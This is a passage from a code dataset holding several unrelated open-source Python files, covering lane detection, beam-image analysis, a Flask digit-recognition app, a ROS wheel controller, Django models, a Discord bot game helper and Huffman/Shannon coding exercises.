torch.nn.ReLU(),\n                torch.nn.Linear(384,self.cls_out)).requires_grad_(requires_grad=False)\n\n        if self.use_aux:\n            self.seg_head = SegHead(backbone, num_lane_on_row + num_lane_on_col)\n        # initialize_weights(self.cls)\n    def forward(self, x):\n\n        x2,x3,fea = self.model(x) # these are the layer-2, layer-3 and layer-4 feature maps\n        if self.use_aux:\n            seg_out = self.seg_head(x2, x3,fea)\n        fea = self.pool(fea)\n        \n        cls_loc_row = fea[:,128:160,...]\n        cls_loc_row = self.cls_loc_row(cls_loc_row)\n        \n        cls_loc_col = fea[:,160:192,...]\n        cls_loc_col = self.cls_loc_col(cls_loc_col)\n        \n        cls_ext_row = fea[:,192:224,...]\n        cls_ext_row = self.cls_ext_row(cls_ext_row)\n        \n        cls_ext_col = fea[:,224:,...]\n        cls_ext_col = self.cls_ext_col(cls_ext_col)\n        \n        cls_lan_cls = x3\n        cls_lan_cls = self.cls_lan_cls(cls_lan_cls)\n        \n        fea = cls_ext_row\n        pred_dict = {\n            'loc_row': cls_loc_row.view(-1,self.num_grid_row, 
self.num_cls_row, self.num_lane_on_row), \n            'loc_col': cls_loc_col.view(-1, self.num_grid_col, self.num_cls_col, self.num_lane_on_col),\n            'exist_row':cls_ext_row.view(-1, 2, self.num_cls_row, self.num_lane_on_row), \n            'exist_col': cls_ext_col.view(-1, 2, self.num_cls_col, self.num_lane_on_col),\n            # # 'lane_labels': F.softmax(out[:,-self.cls_out:].reshape([-1, self.num_lane,self.cls_lane]),dim=1)} #! changed: adding a softmax here slowed convergence\n            'lane_labels': cls_lan_cls.reshape([-1, self.num_lane,self.cls_lane])\n            } #! changed \n        if self.use_aux:\n            pred_dict['seg_out'] = seg_out\n        return pred_dict\n        # for k,v in pred_dict.items():\n        #     print(k,' : ',v.shape)\n        # return fea\n\n    def forward_tta(self, x):\n        x2,x3,fea = self.model(x)\n        \n        pooled_fea = self.pool(fea)\n        n,c,h,w = pooled_fea.shape\n\n        left_pooled_fea = torch.zeros_like(pooled_fea)\n        right_pooled_fea = torch.zeros_like(pooled_fea)\n        up_pooled_fea = torch.zeros_like(pooled_fea)\n        down_pooled_fea = torch.zeros_like(pooled_fea)\n\n        left_pooled_fea[:,:,:,:w-1] = pooled_fea[:,:,:,1:]\n        left_pooled_fea[:,:,:,-1] = pooled_fea.mean(-1)\n        \n        right_pooled_fea[:,:,:,1:] = pooled_fea[:,:,:,:w-1]\n        right_pooled_fea[:,:,:,0] = pooled_fea.mean(-1)\n\n        up_pooled_fea[:,:,:h-1,:] = pooled_fea[:,:,1:,:]\n        up_pooled_fea[:,:,-1,:] = pooled_fea.mean(-2)\n\n        down_pooled_fea[:,:,1:,:] = pooled_fea[:,:,:h-1,:]\n        down_pooled_fea[:,:,0,:] = pooled_fea.mean(-2)\n        # 10 x 25\n        fea = torch.cat([pooled_fea, left_pooled_fea, right_pooled_fea, up_pooled_fea, down_pooled_fea], dim = 0)\n        fea = fea.view(-1, self.input_dim)\n\n        out = self.cls(fea)\n\n        return {'loc_row': out[:,:self.dim1].view(-1,self.num_grid_row, self.num_cls_row, self.num_lane_on_row), \n                'loc_col': out[:,self.dim1:self.dim1+self.dim2].view(-1, self.num_grid_col, self.num_cls_col, self.num_lane_on_col),\n                'exist_row': out[:,self.dim1+self.dim2:self.dim1+self.dim2+self.dim3].view(-1, 2, self.num_cls_row, self.num_lane_on_row), \n                'exist_col': out[:,-self.dim4:].view(-1, 2, self.num_cls_col, self.num_lane_on_col),\n                'lane_labels': out[:,-self.cls_out:].reshape([-1, self.num_lane,self.cls_lane])} \n\ndef get_model(cfg):\n    return parsingNet(pretrained = True, backbone=cfg.backbone, \n                num_grid_row = cfg.num_cell_row, num_cls_row = cfg.num_row, num_grid_col = cfg.num_cell_col, \\\n                num_cls_col = cfg.num_col, num_lane_on_row = cfg.num_lanes, num_lane_on_col = cfg.num_lanes, \\\n                use_aux = cfg.use_aux, input_height = cfg.train_height, \\\n                input_width = cfg.train_width, fc_norm = cfg.fc_norm, \\\n                cls_lane=cfg.cls_lane,train_method=cfg.train_method).cuda()","repo_name":"Salary-only-17k/Ultra-Fast-Lane-Detection-v2-pp","sub_path":"model/model_culane.py","file_name":"model_culane.py","file_ext":"py","file_size_in_byte":10107,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"2227308190","text":"#!/usr/bin/env python\n\nimport os \n\nimport argparse\n\nimport yaml\n\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom matplotlib.patches import Rectangle\n\nimport numpy as np\n\nimport scipy\nfrom scipy.ndimage.filters import gaussian_filter\n\nfrom iminuit import Minuit\nfrom probfit import BinnedChi2, Extended, gaussian, Chi2Regression\n\n__version__ = \"1.0\"\n\n\nclass Hist1D(object):\n\tdef __init__(self, nbins, xlow, xhigh):\n\t\tself.nbins = nbins\n\t\tself.xlow = xlow\n\t\tself.xhigh = xhigh\n\t\tself.hist, self.edges = np.histogram([], bins=nbins, range=(xlow, 
xhigh))\n\t\tself.bins = (self.edges[:-1] + self.edges[1:]) / 2.\n\n\tdef fill(self, value):\n\t\thist, edges = np.histogram([value], bins=self.nbins, range=(self.xlow, self.xhigh))\n\t\tself.hist += hist\n\n\t@property\n\tdef data(self):\n\t\treturn self.bins, self.hist\n\ndef crop_center(img,cropx,cropy):\n y,x = img.shape\n startx = x//2-(cropx//2)\n starty = y//2-(cropy//2) \n return img[starty:starty+cropy,startx:startx+cropx]\n\ndef mm2pix(mm):\n\treturn int(mm * 600.0/25.4)\n\ndef fill_value_to_outer(img,fill_value,xmin,xmax,ymin,ymax):\n\tnew_img = np.copy(img)\n\tfor i in range(len(img)):\n\t\tfor j in range(len(img[i])):\n\t\t\tif i <= xmin or i >= xmax:\n\t\t\t\tnew_img[i][j] = fill_value\n\t\t\tif j <= ymin or j >= ymax:\n\t\t\t\tnew_img[i][j] = fill_value\n\treturn new_img\n\ndef get_sum_values(img,xcen,ycen,xwid,ywid,filter_value=999999999):\n\t# xrange: xcen - xwid / 2 ... xcen + xwid / 2\n\tsummed_value = 0.0\n\tsummed_pixel = 0\n\tfor i in range(len(img)):\n\t\tfor j in range(len(img[i])):\n\t\t\tif (xcen-0.5*xwid) <= i <= (xcen+0.5*xwid) and (ycen-0.5*ywid) <= j <= (ycen+0.5*ywid):\n\t\t\t\tif img[i][j] <= filter_value:\n\t\t\t\t\tsummed_value += img[i][j]\n\t\t\t\t\tsummed_pixel += 1\t\t\t\t\t\n\trect = Rectangle((xcen-0.5*xwid,ycen-0.5*ywid),\n\t\txwid,ywid,fill=False,ec='r',lw=3)\n\treturn (summed_value,summed_pixel,rect)\n\ndef analyze_image(yamlfile,outdir='data/210511/output'):\n\tparam = yaml.load(open(yamlfile))\n\n\t# 600 dpi\n\t# 25.4 mm / 600 pix = 0.0423 mm/pix \n\t# 80.0 mm <--> 1,891 pix\n\t# pix2mm = 25.4 / 600.0 \n\n\tinfile = param['infile']\n\tbasename = os.path.basename(os.path.splitext(infile)[0])\n\n\tfout = open('%s/%s.out' % (outdir,basename),'w')\n\tfout.write(\"%s\\n\" % infile)\n\n\t# Using Mac preview, extract 1,891 pixel square image from the original scanned file.\n\timage_raw = np.array(Image.open(infile).convert('L'))\n\n\tprint(image_raw)\n\tprint(image_raw.shape)\n\n\t# prepare a canvas\n\tfig = plt.figure(figsize=(8,7),tight_layout=True)\n\tax = fig.add_subplot(111,title=param['title'])\n\tax.set_xlabel('Pixel size (0.0423 mm/pix)')\t\t\n\tax.set_ylabel('Pixel size')\n\n\t# plot the raw pixel image\n\taxis_image = plt.imshow(image_raw,aspect='equal',cmap='gist_gray',origin='lower')\n\n\t# add 10 mm line \n\txstart=100\n\tystart=100\n\tplt.plot([xstart,xstart+mm2pix(10.0)],[ystart,ystart],\"-w\")\n\tplt.text(150,120,\"10 mm\",color='w')\n\n\t# filtered image and get the maximum point \n\timage_filtered = gaussian_filter(image_raw,param['gaussian_filter_sigma'])\n\timage_center = fill_value_to_outer(image_filtered,param['fill_value'],param['fill_edge'],1891-param['fill_edge'],param['fill_edge'],1891-param['fill_edge'])\n\tbeam_center_pos = np.unravel_index(np.argmin(image_center),image_center.shape)\n\tplt.plot(beam_center_pos[0],beam_center_pos[1],'*r',\n\t\tlabel='Beam center',markersize=20)\n\n\t# add grid and color bar\n\tplt.grid(color='#979A9A', linestyle='--', linewidth=1)\n\tdivider = make_axes_locatable(ax)\n\tcax = divider.append_axes(\"right\", size=\"5%\", pad=0.08)\t\t\t\n\tfig.colorbar(axis_image, cax=cax, label='gray scale (black:0, white:255)')\n\n\t# add contour after gaussian smoothing\n\taxis_contour = ax.contour(gaussian_filter(image_raw,param['gaussian_filter_sigma']),\n\t\tcmap=\"autumn\")\n\tax.clabel(axis_contour)\n\n\toutpdf = '%s/%s_rawimage.pdf' % (outdir,basename)\n\tfig.savefig(outpdf)\n\n\t###### \n\n\t#hist_pix, edges_pix = np.histogram(image_raw.flatten(),\n\t#\tbins=2**7,range=(0,2**7))\n\t#x_pix = 
0.5*(edges_pix[1:]+edges_pix[:-1])\n\t#fig = plt.figure(figsize=(8,7),tight_layout=True)\n\t#plt.plot(x_pix,hist_pix,marker='', drawstyle='steps-mid')\n\t#plt.xlabel('Pixel value')\n\t#plt.ylabel('Number of pixels')\n\t#fig.savefig('hist.pdf')\n\n\tfig = plt.figure(figsize=(8,7),tight_layout=True)\n\text_gauss = Extended(gaussian)\n\tbc2 = BinnedChi2(ext_gauss, image_raw.flatten(),\n\t\tbins=param['fit_bins'])\n\tm = Minuit(bc2, mean=param['fit_mean'],\n\t\tsigma=param['fit_sigma'], N=param['fit_N'])\n\tm.migrad() # fit\n\tm.print_param()\n\tbc2.draw(m)\n\n\toutpdf = '%s/%s_pixfit.pdf' % (outdir,basename)\n\tfig.savefig(outpdf)\n\n\tflat_pixel_mean = m.values[0]\n\tflat_pixel_sigma = m.values[1]\t\n\n\tfilter_setting = 3 * flat_pixel_sigma\n\tprint(\"filter_setting: %.1f\" % filter_setting)\n\n\timage_flatsub = image_raw-flat_pixel_mean\n\n\t# prepare a canvas\n\tfig = plt.figure(figsize=(8,7),tight_layout=True)\n\tax = fig.add_subplot(111,title=param['title'])\n\tax.set_xlabel('Pixel size (0.0423 mm/pix)')\t\t\n\tax.set_ylabel('Pixel size')\n\n\t# plot the raw pixel image\n\taxis_image = plt.imshow(image_flatsub,aspect='equal',cmap='gist_gray',origin='lower')\n\n\t# add 10 mm line \n\txstart=100\n\tystart=100\n\tplt.plot([xstart,xstart+mm2pix(10.0)],[ystart,ystart],\"-w\")\n\tplt.text(150,120,\"10 mm\",color='w')\n\n\t# filtered image and get the maximum point \n\timage_filtered = gaussian_filter(image_flatsub,param['gaussian_filter_sigma'])\n\timage_center = fill_value_to_outer(image_filtered,param['fill_value'],param['fill_edge'],1891-param['fill_edge'],param['fill_edge'],1891-param['fill_edge'])\n\tbeam_center_pos = np.unravel_index(np.argmin(image_center),image_center.shape)\n\tplt.plot(beam_center_pos[0],beam_center_pos[1],'*r',\n\t\tlabel='Beam center',markersize=20)\n\n\t# add grid and color bar\n\tplt.grid(color='#979A9A', linestyle='--', linewidth=1)\n\tdivider = make_axes_locatable(ax)\n\tcax = divider.append_axes(\"right\", size=\"5%\", pad=0.08)\t\t\t\n\tfig.colorbar(axis_image, cax=cax, label='gray scale (black:0, white:255)')\n\n\t# add contour after gaussian smoothing\n\taxis_contour = ax.contour(gaussian_filter(image_flatsub,param['gaussian_filter_sigma']),\n\t\tlevels=[-9*flat_pixel_sigma,-6*flat_pixel_sigma,-3*flat_pixel_sigma,-flat_pixel_sigma,flat_pixel_sigma,3*flat_pixel_sigma],\n\t\tcmap=\"autumn\")\n\tax.clabel(axis_contour)\n\n\ta60_value,a60_pixel,a60rect = get_sum_values(image_flatsub,\n\t\tparam['center_x'],param['center_y'],mm2pix(param['wide_wid_x']),mm2pix(param['wide_wid_y']),\n#\t\tparam['center_x'],param['center_y'],mm2pix(45),mm2pix(45),\n\t\tfilter_value=filter_setting)\n\tax.add_patch(a60rect) \n\tprint(\"Area60\",a60_value,a60_pixel)\n\n\ta10_value,a10_pixel,a10rect = get_sum_values(image_flatsub,\n\t\tparam['center_x'],param['center_y'],mm2pix(param['center_wid_x']),mm2pix(param['center_wid_y']),\n\t\tfilter_value=filter_setting)\n\tax.add_patch(a10rect) \n\tprint(\"Area10\",a10_value,a10_pixel)\n\n\tfout.write(\"Rect60mm_TotalValue:%d\\n\" % a60_value)\n\tfout.write(\"Rect60mm_TotalPixel:%d\\n\" % a60_pixel)\t\n\tfout.write(\"Rect60mm_TotalRate:%.3e\\n\" % (float(a60_value)/float(a60_pixel)))\n\n\tfout.write(\"Rect10mm_TotalValue:%d\\n\" % a10_value)\n\tfout.write(\"Rect10mm_TotalPixel:%d\\n\" % a10_pixel)\t\n\tfout.write(\"Rect10mm_TotalRate:%.3e\\n\" % (float(a10_value)/float(a10_pixel)))\n\n\tfout.write(\"Rect10mmTo60mm_TotalValueRatio:%.3e\\n\" % (float(a10_value)/float(a60_value)))\n\tfout.write(\"Rect10mmTo60mm_TotalPixelRatio:%.3e\\n\" % 
(float(a10_pixel)/float(a60_pixel)))\n\tfout.write(\"Rect10mmTo60mm_TotalRateRatio:%.3e\\n\" % ((float(a10_value)/float(a10_pixel))/(float(a60_value)/float(a60_pixel))))\n\tfout.close()\n\n\toutpdf = '%s/%s_flatsub.pdf' % (outdir,basename)\n\tfig.savefig(outpdf)\n\ndef get_parser():\n\t\"\"\"\n\tCreates a new argument parser.\n\t\"\"\"\n\tparser = argparse.ArgumentParser('analyze_beam_pattern.py',\n\t\tformatter_class=argparse.RawDescriptionHelpFormatter,\n\t\tdescription=\"\"\"\n\t\tAnalyze beam pattern.\n\t\t\"\"\"\n\t\t)\n\tversion = '%(prog)s ' + __version__\n\tparser.add_argument('--yamlfile', '-i', type=str, \n\t\thelp='Input yamlfile')\t\n\treturn parser\n\ndef main(args=None):\n\tparser = get_parser()\n\targs = parser.parse_args(args)\n\tanalyze_image(args.yamlfile)\n\nif __name__==\"__main__\":\n\tmain()\n","repo_name":"tenoto/ninjatools","sub_path":"ninjatools/analyze_beam_pattern.py","file_name":"analyze_beam_pattern.py","file_ext":"py","file_size_in_byte":8055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28593251357","text":"import torch.nn as nn\nimport numpy as np\nfrom utils import arange\nfrom networks.networks import scSERDUNet\nimport pdb\n\n\ndef set_gpu(network, gpu_ids):\n    network.to(gpu_ids[0])  # Default to the 1st GPU\n    network = nn.DataParallel(network, device_ids=gpu_ids)  # Parallel computing on multiple GPU\n\n    return network\n\n\ndef get_generator(name, opts):\n    # DuRDN\n    if name == 'DuRDN':\n        ic = 1\n        if opts.use_state:\n            ic = ic +1\n        if opts.use_scatter:\n            ic = ic + 1\n        if opts.use_scatter2:\n            ic = ic + 1\n        if opts.use_scatter3:\n            ic = ic + 1\n        if opts.use_bmi:\n            ic = ic + 1\n        if opts.use_gender:\n            ic = ic + 1\n        network = scSERDUNet(n_channels=ic, n_filters=32, n_denselayer=6, growth_rate=32, norm=opts.norm)\n\n\n    num_param = sum([p.numel() for p in network.parameters() if p.requires_grad])\n    print('Number of parameters of Generator: {}'.format(num_param))\n\n    return set_gpu(network, opts.gpu_ids)\n\n","repo_name":"XiongchaoChen/DuRDN_CardiacSPECT_AC","sub_path":"networks/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"14598628582","text":"from flask import Flask, request, jsonify, render_template\nimport base64, json\nfrom io import BytesIO\nfrom model.model import MyModel\nimport numpy as np\n\nHOST = '0.0.0.0'\nPORT = 8888\n\napp = Flask(__name__)\n\nmodel = MyModel('./model/trained_weights.pth', 'cpu')\nCLASS_MAPPING = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabdefghnqrt'\n\n@app.route('/')\ndef home():\n    return render_template(\"home.html\")\n\n@app.route('/predict', methods=['GET','POST'])\ndef predict():\n    results = {\"prediction\" :\"Empty\", \"probability\" :{}}\n\n    # get data\n    input_img = BytesIO(base64.urlsafe_b64decode(request.form['img']))\n\n    # model.predict method takes the raw data and outputs a vector of probabilities\n    res = model.predict(input_img)\n\n    results[\"prediction\"] = str(CLASS_MAPPING[np.argmax(res)])\n    results[\"probability\"] = float(np.max(res))*100\n    \n    # output data\n    return json.dumps(results)\n\nif __name__ == '__main__':\n    \n    app.run(host=HOST,\n            debug=True,\n            port=PORT)\n\n","repo_name":"ashish493/alphanumeric_recognition","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} 
+{"seq_id":"26033197231","text":"#!/usr/bin/env python\n\nimport rospy\nfrom std_msgs.msg import Float64\nfrom geometry_msgs.msg import Vector3\n\n\nVx = 0.0\nVy = 0.0\nVW = 0.0\n\nV1 = 0.0\nV2 = 0.0\nV3 = 0.0\nV4 = 0.0\n\nsend = True\n\ndef transform_(msg): \n global Vx\n global Vy\n global Vw\n\n global V1\n global V2\n global V3\n global V4\n global send\n\n Vx = -msg.x\n Vy = msg.y\n Vw = msg.z\n\n V3 = Vy + Vw #V1\n V2 = -Vx + Vw #V2\n V4 = -Vy + Vw #V3\n V1 = Vx + Vw #V4\n\n send = False\n\nrospy.init_node(\"speed_controller\")\n\nsub = rospy.Subscriber(\"/cmd_vel\", Vector3, transform_)\n\nwheel1 = rospy.Publisher(\"/wheel1/command\", Float64, queue_size = 1)\nwheel2 = rospy.Publisher(\"/wheel2/command\", Float64, queue_size = 1)\nwheel3 = rospy.Publisher(\"/wheel3/command\", Float64, queue_size = 1)\nwheel4 = rospy.Publisher(\"/wheel4/command\", Float64, queue_size = 1)\nr = rospy.Rate(4)\nwhile not rospy.is_shutdown():\n\n #while not send:\n send = True\n wheel1.publish(V1)\n wheel2.publish(V2)\n wheel3.publish(V3)\n wheel4.publish(V4)\n r.sleep()","repo_name":"edgarcamilocamacho/larc_2019","sub_path":"dynamixel_controllers/nodes/speed_controller.py","file_name":"speed_controller.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"2656037255","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\nclass Comments(models.Model):\n\n\tclass Meta:\n\t\tdb_table = \"comments\"\n\n\t# main fields\n\tcomment = models.TextField(blank=False)\n\tcreated_at = models.DateTimeField(auto_now_add=True)\n\tupdated_at = models.DateTimeField(auto_now=True)\n\n\t#relation fields\n\tpost = models.ForeignKey(\n\t\t'posts.Posts', \n\t\ton_delete=models.CASCADE, \n\t\tnull=True,\n\t\trelated_name=\"comments\"\n\t)\n\tcreated_by = models.ForeignKey(\n\t\tUser, \n\t\ton_delete=models.CASCADE, \n\t\tnull=True\n\t)\n\tupdated_by = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n db_column=\"updated_by_id\",\n null=True,\n blank=True,\n related_name='comments_updated_by'\n )\n\n\tdef __str__(self):\n\t\treturn self.comment","repo_name":"azharrizkip/BlogDjangoAPI","sub_path":"comments/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19341313775","text":"from django.conf import settings\nfrom django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'cookbook.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^', include('recipes.urls')),\n)\n\nif settings.DEBUG:\n # for development only: serve media files\n urlpatterns += patterns('',\n url(r'^media/(?P.*)$', 'django.views.static.serve',\n {'document_root': settings.MEDIA_ROOT}),\n )\n","repo_name":"keimlink/django-workshop","sub_path":"src/cookbook_tests_pkg/cookbook/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"51"} +{"seq_id":"26036261020","text":"from IreneAPIWrapper.models import User, BiasGame as BiasGameModel, Person\nfrom disnake import AppCmdInter\nfrom disnake.ext import commands\nfrom ..helper import send_message, check_game_input, in_game\nfrom models import BiasGame\n\n\nasync def process_list_bg(\n 
user_id,\n ctx: commands.Context = None,\n inter: AppCmdInter = None,\n allowed_mentions=None,\n):\n user = await User.get(user_id)\n\n scores = await BiasGameModel.fetch_winners(user_id, limit=15) or {}\n\n results = \"\"\n for score_info in scores.values():\n person_id, wins = score_info[\"personid\"], score_info[\"wins\"]\n person = await Person.get(person_id)\n if not person:\n continue\n results += f\"{str(person.name)} [ID: {person.id}] - {wins} Wins\\n\"\n\n if not results:\n results = \"None\"\n\n await send_message(\n user_id,\n results,\n ctx=ctx,\n inter=inter,\n allowed_mentions=allowed_mentions,\n key=\"list_bg\",\n user=user,\n )\n\n\nasync def process_bg(\n bot,\n user_id,\n bracket_size,\n gender,\n ctx: commands.Context = None,\n inter: AppCmdInter = None,\n allowed_mentions=None,\n):\n user = await User.get(user_id)\n if await in_game(user):\n return await send_message(\n key=\"already_in_game\",\n ctx=ctx,\n inter=inter,\n allowed_mentions=allowed_mentions,\n user=user,\n )\n\n input_check = await check_game_input(\n user=user,\n bracket_size=bracket_size,\n gender=gender,\n )\n\n # inputs did not pass.\n if input_check is not True:\n return await send_message(\n msg=input_check, ctx=ctx, inter=inter, allowed_mentions=allowed_mentions\n )\n\n await send_message(\n bracket_size,\n gender,\n ctx=ctx,\n inter=inter,\n allowed_mentions=allowed_mentions,\n key=\"start_bg\",\n user=user,\n )\n\n game_obj = BiasGame(\n bot,\n bracket_size,\n gender,\n user=user,\n ctx=ctx,\n inter=inter,\n )\n\n await game_obj.start()\n","repo_name":"MujyKun/IreneBot","sub_path":"cogs/biasgame/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"51"} +{"seq_id":"26901469927","text":"#!/usr/bin/python3.6\nimport heapq\nfrom collections import defaultdict\nfrom functools import reduce\nfrom itertools import product\nfrom math import log, ceil\nfrom pprint import pprint\nfrom string import ascii_lowercase\n\n\ndef to_probabilities(src):\n letters, count = zip(*src)\n probs = list(map(lambda x: float(x) / sum(count), count))\n return list(zip(letters, probs))\n\n\ndef source(str):\n d = defaultdict(lambda: 0)\n for c in str:\n d[c] += 1\n return list(d.items())\n\n\ndef source_extension(src, k):\n src = dict(to_probabilities(src))\n\n letters = list(zip(*src))[0]\n words = [''.join(i) for i in list(product(letters, repeat=k))]\n\n d = {}\n for w in words:\n p = 1\n for c in w:\n p *= src[c]\n d[w] = p\n\n return list(d.items())\n\n\ndef entropy_source(src):\n src = to_probabilities(src)\n\n H = 0\n for c, p in src:\n H += p * log(1 / p, 2)\n\n return H\n\n\ndef mean_length(C, probs):\n L = map(lambda x: len(x[1]), C)\n return reduce(lambda x, y: x + y[0] * y[1], zip(probs, L), 0)\n\n\ndef shannon_code(src):\n src = to_probabilities(src)\n src = sorted(src, key=lambda x: x[1], reverse=True)\n\n letters, probs = map(list, zip(*src))\n L = list(map(lambda x: ceil(log(1 / x, 2)), probs)) # shannon code\n\n C = []\n q = ['']\n for n in range(max(L) + 1):\n while L and L[0] == n:\n L.pop(0)\n x = q.pop(0)\n a = letters.pop(0)\n C.append((a, x))\n else:\n aux = []\n for x in q:\n aux.append(x + '0')\n aux.append(x + '1')\n q = aux\n\n return C, mean_length(C, probs)\n\n\ndef balanced_division(src):\n A = []\n B = list(src)\n diff = -reduce(lambda x, y: x + y[1], src, 0) # diff = sum(A)-sum(B)\n while abs(diff + 2 * B[0][1]) < abs(diff):\n x = B.pop(0)\n A.append(x)\n diff += 2 * x[1] # 
diff = (sum(A)+x)-(sum(B)-x) = diff + 2*x\n\n return A, B\n\n\ndef shannon_fano_code1(src, x):\n if len(src) == 1:\n return [(src[0][0], x)]\n else:\n A, B = balanced_division(src)\n\n CA = shannon_fano_code1(A, x + '0')\n CB = shannon_fano_code1(B, x + '1')\n\n return CA + CB\n\n\ndef shannon_fano_code(src):\n src = to_probabilities(src)\n src = sorted(src, key=lambda x: x[1], reverse=True)\n\n C = shannon_fano_code1(src, '')\n probs = map(lambda x: x[1], src)\n\n return C, mean_length(C, probs)\n\n\ndef build_code(tree, x):\n if len(tree) == 1:\n return [(tree[0], x)]\n else:\n CA = build_code(tree[0], x + '0')\n CB = build_code(tree[1], x + '1')\n return CA + CB\n\n\nclass Node:\n def __init__(self, key, value):\n self.key = key\n self.value = value\n\n def __lt__(self, other):\n if self.key == other.key:\n return True\n else:\n return self.key < other.key\n\n\ndef huffman_code(src):\n src = to_probabilities(src)\n src = sorted(src, key=lambda x: x[1])\n\n q = list(map(lambda x: Node(x[1], [x[0]]), src))\n heapq.heapify(q)\n\n while len(q) > 1:\n x = heapq.heappop(q)\n y = heapq.heappop(q)\n heapq.heappush(q, Node(x.key + y.key, [x.value, y.value]))\n tree = heapq.heappop(q).value\n\n C = build_code(tree, '')\n\n probs = []\n src = dict(src)\n for x in map(lambda x: x[0], C):\n probs.append(src[x])\n\n return C, mean_length(C, probs)\n\n\n'''\nwith open('../data/moby_dick.txt') as f:\n txt = f.read()\n txt = list(filter(lambda c: c in ascii_lowercase + ' ', txt.lower()))\n src = source(txt)\n # pprint(sorted(src,key=lambda x:x[1],reverse=True))\n # pprint(sorted(source_extension(src, 2),key=lambda x:x[1],reverse=True))\n print('H = ' + str(entropy_source(src)))\n # print('C = ' + pformat(shannon_code(src)))\n # pprint(shannon_fano_code(src))\n # pprint(shannon_fano_code([('a1',0.36),('a2',0.18),('a3',0.18),('a4',0.12),('a5',0.09),('a6',0.07)]))\n pprint(huffman_code(src))\n'''\n\n# src = [('0',0.9),('1',0.1)]\n# src = source_extension(src,2)\nsrc = source('setzejutgesdunjutjatmengenfetgedunpenjat')\npprint(shannon_code(src))\npprint(shannon_fano_code(src))\npprint(huffman_code(src))\n","repo_name":"oscmansan/DataCompression","sub_path":"lab2/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"9172139998","text":"import torch\nfrom torch import nn\n\nfrom .fc_model import FCEncoder, FCDecoder, FCClassifier\nfrom .pooling_layer import AvgPooling, LastPooling, LinearSeqAttnPooling, NoPooling\nfrom .rnn_model import RNNEncoder, RNNDecoder\n\n\nclass MultiTask_Model(nn.Module):\n\tdef __init__(self, encoder_type, decoder_type,pool_type, params):\n\t\tsuper(MultiTask_Model, self).__init__()\n\n\t\tself.encoder_type = encoder_type\n\t\tself.pool_type = pool_type\n\t\tself.decoder_type = decoder_type\n\t\tself.params = params\n\t\tself.train_param=self.params.train_param()\n\t\tself.traj_attn_intent_dim = self.train_param['traj_attn_intent_dim']\n\n\t\tself.encoder = self._create_encoder(self.encoder_type)\n\t\tself.enc_out_units = self.encoder.output_units\n\n\t\tself.decoder = self._create_decoder(self.decoder_type)\n\n\t\tself.clf_pool = self._create_pooling(self.pool_type)\n\t\tself.classifier = self._create_decoder(decoder_type='classifier')\n\n\t\tif self.traj_attn_intent_dim>0:\n\t\t\tself.attn_pool = self._create_pooling(self.pool_type,input_size=self.traj_attn_intent_dim)\n\n\n\tdef _create_encoder(self, encoder_type):\n\t\t# create encoder\n\t\tif 
encoder_type == 'rnn':\n\t\t\trnn_param = self.params.encode_rnn_param()\n\t\t\tencoder = RNNEncoder(**rnn_param)\n\t\telse:\n\t\t\tfc_param = self.params.encode_fc_param()\n\t\t\tencoder = FCEncoder(**fc_param)\n\t\treturn encoder\n\n\tdef _create_pooling(self, pool_type,input_size=None):\n\t\tif input_size is None:\n\t\t\tinput_size=self.enc_out_units\n\t\tif pool_type == 'mean' or pool_type == 'avg':\n\t\t\tpool = AvgPooling()\n\t\telif pool_type == 'last':\n\t\t\tpool = LastPooling()\n\t\telif pool_type == 'linear_attn':\n\t\t\tpool = LinearSeqAttnPooling(input_size=input_size)\n\t\telse:\n\t\t\tpool = NoPooling()\n\t\treturn pool\n\n\tdef _create_decoder(self, decoder_type):\n\t\tif decoder_type == 'rnn':\n\t\t\trnn_params = self.params.decode_rnn_param()\n\t\t\tdecoder = RNNDecoder(encoder_output_units=self.enc_out_units,traj_attn_intent_dim=self.traj_attn_intent_dim,\n\t\t\t **rnn_params)\n\t\telif decoder_type == 'classifier':\n\t\t\tclf_params = self.params.classifier_fc_param()\n\t\t\tdecoder = FCClassifier(encoder_output_units=self.enc_out_units,traj_attn_intent_dim=self.traj_attn_intent_dim,\n\t\t\t **clf_params)\n\t\telse:\n\t\t\tfc_param = self.params.decode_fc_param()\n\t\t\tdecoder = FCDecoder(encoder_output_units=self.enc_out_units,traj_attn_intent_dim=self.traj_attn_intent_dim,\n\t\t\t **fc_param)\n\n\t\treturn decoder\n\n\tdef forward(self, src_seq,start_decode=None,encoder_mask=None):\n\n\t\tenc = self.encoder(src_seq)\n\t\tencoder_out, encoder_state= enc\n\n\t\tif self.decoder_type == 'rnn':\n\t\t\tout_traj, hidden_out_traj = self.decoder(enc, start_decode,encoder_mask=encoder_mask)\n\t\telse:\n\t\t\tout_traj,hidden_out_traj = self.decoder(encoder_out)\n\n\n\t\tclf_inp = self.clf_pool(encoder_out,x_mask=encoder_mask)\n\t\tif 